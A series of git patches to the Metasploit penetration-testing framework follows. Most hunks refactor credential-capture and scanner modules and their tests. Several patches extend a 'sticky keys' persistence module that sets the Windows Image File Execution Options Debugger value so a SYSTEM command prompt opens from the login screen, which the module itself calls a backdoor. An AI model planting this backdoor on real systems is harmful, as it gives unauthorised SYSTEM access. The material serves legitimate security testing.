+      private_type: :password
     }.merge(service_data)
 
     login_data = {
diff --git a/modules/auxiliary/server/capture/ftp.rb b/modules/auxiliary/server/capture/ftp.rb
index 4ff3781d45..667eca6a4a 100644
--- a/modules/auxiliary/server/capture/ftp.rb
+++ b/modules/auxiliary/server/capture/ftp.rb
@@ -65,7 +65,7 @@ class Metasploit3 < Msf::Auxiliary
       module_fullname: fullname,
       username: opts[:user],
       private_data: opts[:password],
-      private_type: :nonreplayable_hash
+      private_type: :password
     }.merge(service_data)
 
     login_data = {
diff --git a/modules/auxiliary/server/capture/http_basic.rb b/modules/auxiliary/server/capture/http_basic.rb
index 5aaf38f579..8e8db5c2ab 100644
--- a/modules/auxiliary/server/capture/http_basic.rb
+++ b/modules/auxiliary/server/capture/http_basic.rb
@@ -72,7 +72,7 @@ class Metasploit3 < Msf::Auxiliary
       module_fullname: fullname,
       username: opts[:user],
       private_data: opts[:password],
-      private_type: :nonreplayable_hash
+      private_type: :password
     }.merge(service_data)
 
     login_data = {
diff --git a/modules/auxiliary/server/capture/pop3.rb b/modules/auxiliary/server/capture/pop3.rb
index ec81648a73..f22877434f 100644
--- a/modules/auxiliary/server/capture/pop3.rb
+++ b/modules/auxiliary/server/capture/pop3.rb
@@ -70,7 +70,7 @@ class Metasploit3 < Msf::Auxiliary
       module_fullname: fullname,
       username: opts[:user],
       private_data: opts[:password],
-      private_type: :nonreplayable_hash
+      private_type: :password
     }.merge(service_data)
 
     login_data = {
diff --git a/modules/auxiliary/server/capture/postgresql.rb b/modules/auxiliary/server/capture/postgresql.rb
index 83cd3e4dc0..d9f11042d1 100644
--- a/modules/auxiliary/server/capture/postgresql.rb
+++ b/modules/auxiliary/server/capture/postgresql.rb
@@ -56,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary
       module_fullname: fullname,
       username: opts[:user],
       private_data: opts[:password],
-      private_type: :nonreplayable_hash
+      private_type: :password
     }.merge(service_data)
 
     login_data = {
diff --git a/modules/auxiliary/server/capture/sip.rb b/modules/auxiliary/server/capture/sip.rb
index 9750a43e1b..03dd3e2113 100644
--- a/modules/auxiliary/server/capture/sip.rb
+++ b/modules/auxiliary/server/capture/sip.rb
@@ -118,7 +118,7 @@ class Metasploit3 < Msf::Auxiliary
       module_fullname: fullname,
       username: opts[:user],
       private_data: opts[:password],
-      private_type: :nonreplayable_hash
+      private_type: :password
     }.merge(service_data)
 
     login_data = {
diff --git a/test/modules/auxiliary/test/report_auth_info.rb b/test/modules/auxiliary/test/report_auth_info.rb
index 1149cf7a4f..0a43898e17 100644
--- a/test/modules/auxiliary/test/report_auth_info.rb
+++ b/test/modules/auxiliary/test/report_auth_info.rb
@@ -7,10 +7,11 @@ require 'msf/core'
 
 class Metasploit3 < Msf::Auxiliary
 
-  FAKE_IP   = '192.168.12.123'
-  FAKE_PORT = 80
-  FAKE_USER = 'user'
-  FAKE_PASS = 'password'
+  FAKE_IP    = '192.168.12.123'
+  FAKE_PORT  = 80
+  FAKE_USER  = 'user'
+  FAKE_PASS  = 'password'
+  FAKE_PROOF = 'proof'
 
   def initialize(info = {})
     super(update_info(info,
@@ -125,265 +126,177 @@ class Metasploit3 < Msf::Auxiliary
 
   def test_hp_imc_som_create_account
     mod = framework.auxiliary.create('admin/hp/hp_imc_som_create_account')
-    mod.report_cred(
-      ip: FAKE_IP,
-      port: FAKE_PORT,
-      service_name: 'https',
-      user: FAKE_USER,
-      password: FAKE_PASS,
-      proof: ''
-    )
+    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'https', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
   end
 
   def test_dlink_dir_645_password_extractor
     mod = framework.auxiliary.create('admin/http/dlink_dir_645_password_extractor')
-    mod.report_cred(
-      ip: FAKE_IP,
-      port: FAKE_PORT,
-      service_name: 'http',
-      user: FAKE_USER,
-      password: FAKE_PASS,
-      proof: ''
-    )
+    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'http', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
   end
 
   def test_dlink_dsl320b_password_extractor
     mod = framework.auxiliary.create('admin/http/dlink_dsl320b_password_extractor')
-    mod.report_cred(
-      ip: FAKE_IP,
-      port: FAKE_PORT,
-      service_name: 'http',
-      user: FAKE_USER,
-      password: FAKE_PASS,
-      proof: ''
-    )
+    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'http', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF )
   end
 
   def test_nexpose_xxe_file_read
     mod = framework.auxiliary.create('admin/http/nexpose_xxe_file_read')
-    mod.report_cred(
-      ip: FAKE_IP,
-      port: FAKE_PORT,
-      service_name: 'http',
-      user: FAKE_USER,
-      password: FAKE_PASS,
-      proof: ''
-    )
+    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'http', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
   end
 
   def test_vbulletin_upgrade_admin
     mod = framework.auxiliary.create('admin/http/vbulletin_upgrade_admin')
-    mod.report_cred(
-      ip: FAKE_IP,
-      port: FAKE_PORT,
-      service_name: 'http',
-      user: FAKE_USER,
-      password: FAKE_PASS,
-      proof: ''
-    )
+    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'http', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
   end
 
   def test_wp_custom_contact_forms
     mod = framework.auxiliary.create('admin/http/wp_custom_contact_forms')
-    mod.report_cred(
-      ip: FAKE_IP,
-      port: FAKE_PORT,
-      user: FAKE_USER,
-      password: FAKE_PASS,
-      service_name: 'WordPress',
-      proof: ''
-    )
+    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, user: FAKE_USER, password: FAKE_PASS, service_name: 'WordPress', proof: FAKE_PROOF)
   end
 
   def test_zyxel_admin_password_extractor
     mod = framework.auxiliary.create('admin/http/zyxel_admin_password_extractor')
-    mod.report_cred(
-      ip: FAKE_IP,
-      port: FAKE_PORT,
-      service_name: 'ZyXEL GS1510-16',
-      user: FAKE_USER,
-      password: FAKE_PASS,
-      proof: ''
-    )
+    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'ZyXEL GS1510-16', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
   end
 
   def test_sercomm_dump_config
     mod = framework.auxiliary.create('admin/misc/sercomm_dump_config')
-    mod.report_cred(
-      ip: FAKE_IP,
-      port: FAKE_PORT,
-      user: FAKE_USER,
-      password: FAKE_PASS,
-      service_name: 'sercomm',
-      proof: ''
-    )
+    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, user: FAKE_USER, password: FAKE_PASS, service_name: 'sercomm', proof: FAKE_PROOF)
   end
 
   def test_vnc
     mod = framework.auxiliary.create('server/capture/vnc')
-    mod.report_cred(
-      ip: FAKE_IP,
-      port: FAKE_PORT,
-      service_name: 'vnc_client',
-      user: '',
-      password: FAKE_PASS,
-      proof: ''
-    )
+    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'vnc_client', user: '', password: FAKE_PASS, proof: FAKE_PROOF )
   end
 
   def test_smtp
     mod = framework.auxiliary.create('server/capture/smtp')
-    mod.report_cred(
-      ip: FAKE_IP,
-      port: FAKE_PORT,
-      service_name: 'pop3',
-      user: FAKE_USER,
-      password: FAKE_PASS,
-      proof: ''
-    )
+    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'pop3', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
   end
 
   def test_sip
     mod = framework.auxiliary.create('server/capture/sip')
-    mod.report_cred(
-      ip: FAKE_IP,
-      port: FAKE_PORT,
-      service_name: 'sip_client',
-      user:FAKE_USER,
-      password: FAKE_PASS,
-      proof: ''
-    )
+    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'sip_client', user:FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
   end
 
   def test_oracle_login
     mod = framework.auxiliary.create('admin/oracle/oracle_login')
-    mod.report_cred(
-      ip: FAKE_IP,
-      port: FAKE_PORT,
-      service_name: 'oracle',
-      user: FAKE_USER,
-      password: FAKE_PASS
-    )
+    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'oracle', user: FAKE_USER, password: FAKE_PASS )
   end
 
   def test_postgresql
     mod = framework.auxiliary.create('server/capture/postgresql')
-    mod.report_cred(
-      ip: FAKE_IP,
-      port: FAKE_PORT,
-      service_name: 'psql_client',
-      user: FAKE_USER,
-      password: FAKE_PASS,
-      proof: ''
-    )
+    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'psql_client', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
   end
 
   def test_pop3
     mod = framework.auxiliary.create('server/capture/pop3')
-    mod.report_cred(
-      ip: FAKE_IP,
-      port: FAKE_PORT,
-      service_name: 'pop3',
-      user: FAKE_USER,
-      password: FAKE_PASS,
-      proof: ''
-    )
+    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'pop3', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF )
   end
 
   def test_http_basic
     mod = framework.auxiliary.create('server/capture/http_basic')
-    mod.report_cred(
-      ip: FAKE_IP,
-      port: FAKE_PORT,
-      service_name: 'HTTP',
-      user: FAKE_USER,
-      password: FAKE_PASS,
-      proof: ''
-    )
+    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'HTTP', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF )
   end
 
   def test_ftp
     mod = framework.auxiliary.create('server/capture/ftp')
-    mod.report_cred(
-      ip: FAKE_IP,
-      port: FAKE_PORT,
-      service_name: 'ftp',
-      user: FAKE_USER,
-      password: FAKE_PASS,
-      proof: ''
-    )
+    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'ftp', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
   end
 
   def test_drda
     mod = framework.auxiliary.create('server/capture/drda')
-    mod.report_cred(
-      ip: FAKE_IP,
-      port: FAKE_PORT,
-      service_name: 'db2_client',
-      user: FAKE_USER,
-      password: FAKE_PASS,
-      proof: ''
-    )
+    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'db2_client', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
   end
 
   def test_koyo_login
     mod = framework.auxiliary.create('scanner/scada/koyo_login')
-    mod.report_cred(
-      ip: FAKE_IP,
-      port: FAKE_PORT,
-      service_name: 'koyo',
-      user: '',
-      password: FAKE_PASS,
-      proof: ''
-    )
+    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'koyo', user: '', password: FAKE_PASS, proof: FAKE_PROOF)
   end
 
   def test_openvas_otp_login
     mod = framework.auxiliary.create('scanner/openvas/openvas_otp_login')
-    mod.report_cred(
-      ip: FAKE_IP,
-      port: FAKE_PORT,
-      service_name: 'openvas-otp',
-      user: FAKE_USER,
-      password: FAKE_PASS,
-      proof: ''
-    )
+    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'openvas-otp', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
   end
 
   def test_openvas_omp_login
     mod = framework.auxiliary.create('scanner/openvas/openvas_omp_login')
-    mod.report_cred(
-      ip: FAKE_IP,
-      port: FAKE_PORT,
-      service_name: 'openvas-omp',
-      user: FAKE_USER,
-      password: FAKE_PASS,
-      proof: @result
-    )
+    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'openvas-omp', user: FAKE_USER, password: FAKE_PASS, proof: @result)
   end
 
   def test_openvas_gsad_login
     mod = framework.auxiliary.create('scanner/openvas/openvas_gsad_login')
-    mod.report_cred(
-      ip: FAKE_IP,
-      port: FAKE_PORT,
-      service_name: 'openvas-gsa',
-      user: FAKE_USER,
-      password: FAKE_PASS,
-      proof: ''
-    )
+    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'openvas-gsa', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
   end
 
   def test_nexpose_api_login
     mod = framework.auxiliary.create('scanner/nexpose/nexpose_api_login')
-    mod.report_cred(
-      ip: FAKE_IP,
-      port: FAKE_PORT,
-      service_name: 'nexpose',
-      user: FAKE_USER,
-      password: FAKE_PASS,
-      proof: ''
-    )
+    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'nexpose', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
+  end
+
+  def test_nessus_ntp_login
+    mod = framework.auxiliary.create('scanner/nessus/nessus_ntp_login')
+    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'nessus-ntp', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
+  end
+
+  def test_msf_web_login
+    mod = framework.auxiliary.create('scanner/msf/msf_web_login')
+    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'msf-web', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
+  end
+
+  def test_msf_rpc_login
+    mod = framework.auxiliary.create('scanner/msf/msf_rpc_login')
+    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'msf-rpc', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF )
+  end
+
+  def test_mongodb_login
+    mod = framework.auxiliary.create('scanner/mongodb/mongodb_login')
+    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'mongodb', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
+  end
+
+  def test_rosewill_rxs3211_passwords
+    mod = framework.auxiliary.create('scanner/misc/rosewill_rxs3211_passwords')
+    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'ipcam', user: '', password: FAKE_PASS, proof: FAKE_PROOF)
+  end
+
+  def test_raysharp_dvr_passwords
+    mod = framework.auxiliary.create('scanner/misc/raysharp_dvr_passwords')
+    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'dvr', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
+  end
+
+  def test_oki_scanner
+    mod = framework.auxiliary.create('scanner/misc/oki_scanner')
+    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'http', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
+  end
+
+  def test_dvr_config_disclosure
+    mod = framework.auxiliary.create('scanner/misc/dvr_config_disclosure')
+    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'ftp', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
+  end
+
+  def test_typo3_bruteforce
+    mod = framework.auxiliary.create('scanner/http/typo3_bruteforce')
+    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'typo3', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
+  end
+
+  def test_squiz_matrix_user_enum
+    mod = framework.auxiliary.create('scanner/http/squiz_matrix_user_enum')
+    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'http', proof: FAKE_PROOF)
+  end
+
+  def test_sevone_enum
+    mod = framework.auxiliary.create('scanner/http/sevone_enum')
+    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'http', user: FAKE_USER, password: FAKE_PASS, proof: '') 
+  end
+
+  def test_sentry_cdu_enum
+    mod = framework.auxiliary.create('scanner/http/sentry_cdu_enum')
+    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'http', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
+  end
+
+  def test_sap_businessobjects_user_brute_web
+    mod = framework.auxiliary.create('scanner/http/sap_businessobjects_user_brute_web')
+    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'sap-businessobjects', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
   end
 
   def run

From e60f590f095cbc5f0abd8b2f5fb8fc2bcf8f791a Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Fri, 24 Jul 2015 07:20:31 +1000
Subject: [PATCH 0862/1013] Add DisplaySwitch.exe support with WINDOWS+P

As per @mubix's request.
---
 modules/post/windows/manage/sticky_keys.rb | 11 ++++++++---
 1 file changed, 8 insertions(+), 3 deletions(-)

diff --git a/modules/post/windows/manage/sticky_keys.rb b/modules/post/windows/manage/sticky_keys.rb
index 146317f58d..44da674417 100644
--- a/modules/post/windows/manage/sticky_keys.rb
+++ b/modules/post/windows/manage/sticky_keys.rb
@@ -26,8 +26,9 @@ class Metasploit4 < Msf::Post
         The module options allow for this hack to be applied to:
 
         - SETHC   - sethc.exe is invoked when SHIFT is pressed 5 times.
-        - UTILMAN - utilman.exe is invoked by pressing WINDOWS+U
+        - UTILMAN - Utilman.exe is invoked by pressing WINDOWS+U.
         - OSK     - osk.exe is invoked by pressing WINDOWS+U, then launching the on-screen keyboard.
+        - DISP    - DisplaySwitch.exe is invoked by pressing WINDOWS+P.
 
         The hack can be added using the ADD action, and removed with the REMOVE action.
 
@@ -42,7 +43,7 @@ class Metasploit4 < Msf::Post
 
     register_options([
       OptEnum.new('ACTION', [true, 'Specifies whether to add or remove the exploit.', 'ADD', ['ADD', 'REMOVE']]),
-      OptEnum.new('TARGET', [true, 'The target binary to add the exploit to.', 'SETHC', ['SETHC', 'UTILMAN', 'OSK']]),
+      OptEnum.new('TARGET', [true, 'The target binary to add the exploit to.', 'SETHC', ['SETHC', 'UTILMAN', 'OSK', 'DISP']]),
       OptString.new('EXE', [true, 'Executable to execute when the exploit is triggered', '%SYSTEMROOT%\system32\cmd.exe'])
     ], self.class)
   end
@@ -53,9 +54,11 @@ class Metasploit4 < Msf::Post
   def get_target_exe_name
     case datastore['TARGET']
     when 'UTILMAN'
-     'utilman.exe'
+     'Utilman.exe'
     when 'OSK'
      'osk.exe'
+    when 'DISP'
+      'DisplaySwitch.exe'
     else
      'sethc.exe'
     end
@@ -70,6 +73,8 @@ class Metasploit4 < Msf::Post
       'WINDOWS+U'
     when 'OSK'
       'WINDOWS+U, then launching the on-screen keyboard'
+    when 'DISP'
+      'WINDOWS+P'
     else
       'SHIFT 5 times'
     end

From 616e1ddd6879dde0403a1ea3d11778c06ae82f2c Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Fri, 24 Jul 2015 08:01:58 +1000
Subject: [PATCH 0863/1013] Change enum to action, a couple of tidies

---
 modules/post/windows/manage/sticky_keys.rb | 22 +++++++++++++---------
 1 file changed, 13 insertions(+), 9 deletions(-)

diff --git a/modules/post/windows/manage/sticky_keys.rb b/modules/post/windows/manage/sticky_keys.rb
index 44da674417..2388bb4577 100644
--- a/modules/post/windows/manage/sticky_keys.rb
+++ b/modules/post/windows/manage/sticky_keys.rb
@@ -14,10 +14,10 @@ class Metasploit4 < Msf::Post
   DEBUG_REG_PATH = 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options'
   DEBUG_REG_VALUE = 'Debugger'
 
-  def initialize(info={})
+  def initialize(info = {})
     super(update_info(info,
-      'Name'         => 'Sticky Keys Persistance Module',
-      'Description'  => %q{
+      'Name'          => 'Sticky Keys Persistance Module',
+      'Description'   => %q{
         This module makes it possible to apply the 'sticky keys' hack to a session with appropriate
         rights. The hack provides a means to get a SYSTEM shell using UI-level interaction at an RDP
         login screen or via a UAC confirmation dialog. The module modifies the Debug registry setting
@@ -36,13 +36,17 @@ class Metasploit4 < Msf::Post
         to the target prior to running the module. By default, a SYSTEM command prompt is installed
         using the registry method if this module is run without modifying any parameters.
       },
-      'Author'       => ['OJ Reeves'],
-      'Platform'     => ['win'],
-      'SessionTypes' => ['meterpreter', 'cmd']
+      'Author'        => ['OJ Reeves'],
+      'Platform'      => ['win'],
+      'SessionTypes'  => ['meterpreter', 'cmd'],
+      'Actions'       => [
+          [ 'ADD',    { 'Description' => 'Add the backdoor to the target.' } ],
+          [ 'REMOVE', { 'Description' => 'Remove the backdoor from the target' } ]
+      ],
+      'DefaultAction' => 'ADD'
     ))
 
     register_options([
-      OptEnum.new('ACTION', [true, 'Specifies whether to add or remove the exploit.', 'ADD', ['ADD', 'REMOVE']]),
       OptEnum.new('TARGET', [true, 'The target binary to add the exploit to.', 'SETHC', ['SETHC', 'UTILMAN', 'OSK', 'DISP']]),
       OptString.new('EXE', [true, 'Executable to execute when the exploit is triggered', '%SYSTEMROOT%\system32\cmd.exe'])
     ], self.class)
@@ -96,11 +100,11 @@ class Metasploit4 < Msf::Post
       fail_with(Failure::NoAccess, 'The current session does not have administrative rights.')
     end
 
-    print_good("Session has administrator rights, proceeding.")
+    print_good("Session has administrative rights, proceeding.")
 
     target_key = get_target_exe_reg_key
 
-    if datastore['ACTION'] == 'ADD'
+    if action.name == 'ADD'
       command = expand_path(datastore['EXE'])
 
       registry_createkey(target_key)

From db7fadfc363cc5c865d91c7b20b682b0b4257c6b Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Fri, 24 Jul 2015 08:08:01 +1000
Subject: [PATCH 0864/1013] Fix indentation

---
 modules/post/windows/manage/sticky_keys.rb | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/modules/post/windows/manage/sticky_keys.rb b/modules/post/windows/manage/sticky_keys.rb
index 2388bb4577..bf96149f1c 100644
--- a/modules/post/windows/manage/sticky_keys.rb
+++ b/modules/post/windows/manage/sticky_keys.rb
@@ -40,8 +40,8 @@ class Metasploit4 < Msf::Post
       'Platform'      => ['win'],
       'SessionTypes'  => ['meterpreter', 'cmd'],
       'Actions'       => [
-          [ 'ADD',    { 'Description' => 'Add the backdoor to the target.' } ],
-          [ 'REMOVE', { 'Description' => 'Remove the backdoor from the target' } ]
+        [ 'ADD',    { 'Description' => 'Add the backdoor to the target.' } ],
+        [ 'REMOVE', { 'Description' => 'Remove the backdoor from the target' } ]
       ],
       'DefaultAction' => 'ADD'
     ))

From ebdbb179ce9cab479f4c60f9051be56b69b8fc74 Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Fri, 24 Jul 2015 08:09:25 +1000
Subject: [PATCH 0865/1013] Last of the style fixes

---
 modules/post/windows/manage/sticky_keys.rb | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/modules/post/windows/manage/sticky_keys.rb b/modules/post/windows/manage/sticky_keys.rb
index bf96149f1c..134c332896 100644
--- a/modules/post/windows/manage/sticky_keys.rb
+++ b/modules/post/windows/manage/sticky_keys.rb
@@ -40,8 +40,8 @@ class Metasploit4 < Msf::Post
       'Platform'      => ['win'],
       'SessionTypes'  => ['meterpreter', 'cmd'],
       'Actions'       => [
-        [ 'ADD',    { 'Description' => 'Add the backdoor to the target.' } ],
-        [ 'REMOVE', { 'Description' => 'Remove the backdoor from the target' } ]
+        ['ADD',    {'Description' => 'Add the backdoor to the target.'}],
+        ['REMOVE', {'Description' => 'Remove the backdoor from the target.'}]
       ],
       'DefaultAction' => 'ADD'
     ))

From e32b3c71f49ae6902c33b87143efa95c9d62b09f Mon Sep 17 00:00:00 2001
From: Tod Beardsley <tod_beardsley@rapid7.com>
Date: Thu, 23 Jul 2015 17:11:19 -0500
Subject: [PATCH 0866/1013] Fix ZDI ref on sandbox escape module

---
 modules/auxiliary/gather/safari_file_url_navigation.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/auxiliary/gather/safari_file_url_navigation.rb b/modules/auxiliary/gather/safari_file_url_navigation.rb
index 44e556096d..c4509baf81 100644
--- a/modules/auxiliary/gather/safari_file_url_navigation.rb
+++ b/modules/auxiliary/gather/safari_file_url_navigation.rb
@@ -27,7 +27,7 @@ class Metasploit3 < Msf::Auxiliary
         'joev' # discovery, module
       ],
       'References'  => [
-        ['ZDI', '15-288'],
+        ['ZDI', '15-228'],
         ['CVE', '2015-1155'],
         ['URL', 'https://support.apple.com/en-us/HT204826']
       ],

From 06ed7ba574d9d157b48c4951a9db18cd70462af9 Mon Sep 17 00:00:00 2001
From: William Vu <William_Vu@rapid7.com>
Date: Thu, 23 Jul 2015 17:12:17 -0500
Subject: [PATCH 0867/1013] Add a comma

---
 modules/post/windows/manage/sticky_keys.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/post/windows/manage/sticky_keys.rb b/modules/post/windows/manage/sticky_keys.rb
index 134c332896..bee682be4b 100644
--- a/modules/post/windows/manage/sticky_keys.rb
+++ b/modules/post/windows/manage/sticky_keys.rb
@@ -48,7 +48,7 @@ class Metasploit4 < Msf::Post
 
     register_options([
       OptEnum.new('TARGET', [true, 'The target binary to add the exploit to.', 'SETHC', ['SETHC', 'UTILMAN', 'OSK', 'DISP']]),
-      OptString.new('EXE', [true, 'Executable to execute when the exploit is triggered', '%SYSTEMROOT%\system32\cmd.exe'])
+      OptString.new('EXE', [true, 'Executable to execute when the exploit is triggered.', '%SYSTEMROOT%\system32\cmd.exe'])
     ], self.class)
   end
 

From 8bead5fde2c83b594964e348eea47c03ccc14061 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Thu, 23 Jul 2015 18:07:19 -0500
Subject: [PATCH 0868/1013] Modate update on using metasploit-credential

Update some more modules to usethe new cred API.
Also, make sure to always provide proof because that seems handy.
---
 .../scanner/http/axis_local_file_include.rb   |  3 +-
 .../auxiliary/scanner/http/cisco_asa_asdm.rb  |  3 +-
 .../scanner/http/cisco_ironport_enum.rb       |  3 +-
 .../auxiliary/scanner/http/cisco_ssl_vpn.rb   |  3 +-
 .../http/dlink_dir_300_615_http_login.rb      |  4 +-
 .../scanner/http/dlink_dir_615h_http_login.rb |  3 +-
 .../http/dlink_dir_session_cgi_http_login.rb  |  3 +-
 .../auxiliary/scanner/http/dolibarr_login.rb  |  3 +-
 .../scanner/http/drupal_views_user_enum.rb    |  4 +-
 .../scanner/http/ektron_cms400net.rb          |  3 +-
 .../scanner/http/etherpad_duo_login.rb        |  3 +-
 .../auxiliary/scanner/http/infovista_enum.rb  |  3 +-
 .../scanner/http/joomla_bruteforce_login.rb   |  3 +-
 .../scanner/http/novell_mdm_creds.rb          |  3 +-
 .../scanner/http/oracle_ilom_login.rb         | 45 ++++++++++---
 .../auxiliary/scanner/http/pocketpad_login.rb | 45 ++++++++++---
 .../scanner/http/radware_appdirector_enum.rb  | 44 ++++++++++---
 .../scanner/http/rfcode_reader_enum.rb        | 45 ++++++++++---
 .../http/sap_businessobjects_user_brute.rb    | 38 ++++++++---
 .../scanner/http/splunk_web_login.rb          |  3 +-
 modules/auxiliary/scanner/http/vcms_login.rb  |  3 +-
 .../auxiliary/scanner/misc/cctv_dvr_login.rb  |  3 +-
 .../scanner/telnet/telnet_ruggedcom.rb        |  3 +-
 .../scanner/vmware/vmware_http_login.rb       |  3 +-
 modules/auxiliary/voip/asterisk_login.rb      |  3 +-
 .../auxiliary/test/report_auth_info.rb        | 65 +++++++++++++------
 26 files changed, 256 insertions(+), 88 deletions(-)

diff --git a/modules/auxiliary/scanner/http/axis_local_file_include.rb b/modules/auxiliary/scanner/http/axis_local_file_include.rb
index 36d12c6d3a..fe384ff9aa 100644
--- a/modules/auxiliary/scanner/http/axis_local_file_include.rb
+++ b/modules/auxiliary/scanner/http/axis_local_file_include.rb
@@ -91,6 +91,7 @@ class Metasploit3 < Msf::Auxiliary
       last_attempted_at: DateTime.now,
       core: create_credential(credential_data),
       status: Metasploit::Model::Login::Status::SUCCESSFUL,
+      proof: opts[:proof]
     }.merge(service_data)
 
     create_credential_login(login_data)
@@ -122,7 +123,7 @@ class Metasploit3 < Msf::Auxiliary
 
           print_good("#{target_url} - Apache Axis - Credentials Found Username: '#{username}' - Password: '#{password}'")
 
-          report_cred(ip: rhost, port: rport, user: username, password: password)
+          report_cred(ip: rhost, port: rport, user: username, password: password, proof: res.body)
 
         else
           print_error("#{target_url} - Apache Axis - Not Vulnerable")
diff --git a/modules/auxiliary/scanner/http/cisco_asa_asdm.rb b/modules/auxiliary/scanner/http/cisco_asa_asdm.rb
index b01d8af730..f9c8611e68 100644
--- a/modules/auxiliary/scanner/http/cisco_asa_asdm.rb
+++ b/modules/auxiliary/scanner/http/cisco_asa_asdm.rb
@@ -109,6 +109,7 @@ class Metasploit3 < Msf::Auxiliary
       last_attempted_at: DateTime.now,
       core: create_credential(credential_data),
       status: Metasploit::Model::Login::Status::SUCCESSFUL,
+      proof: opts[:proof]
     }.merge(service_data)
 
     create_credential_login(login_data)
@@ -139,7 +140,7 @@ class Metasploit3 < Msf::Auxiliary
 
         print_good("#{peer} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}")
 
-        report_cred(ip: rhost, port: rport, user: user, password: pass)
+        report_cred(ip: rhost, port: rport, user: user, password: pass, proof: res.body)
         return :next_user
 
       else
diff --git a/modules/auxiliary/scanner/http/cisco_ironport_enum.rb b/modules/auxiliary/scanner/http/cisco_ironport_enum.rb
index 3b79e2dda9..a236e8138a 100644
--- a/modules/auxiliary/scanner/http/cisco_ironport_enum.rb
+++ b/modules/auxiliary/scanner/http/cisco_ironport_enum.rb
@@ -135,6 +135,7 @@ class Metasploit3 < Msf::Auxiliary
       last_attempted_at: DateTime.now,
       core: create_credential(credential_data),
       status: Metasploit::Model::Login::Status::SUCCESSFUL,
+      proof: opts[:proof]
     }.merge(service_data)
 
     create_credential_login(login_data)
@@ -164,7 +165,7 @@ class Metasploit3 < Msf::Auxiliary
       if res and res.get_cookies.include?('authenticated=')
         print_good("#{rhost}:#{rport} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}")
 
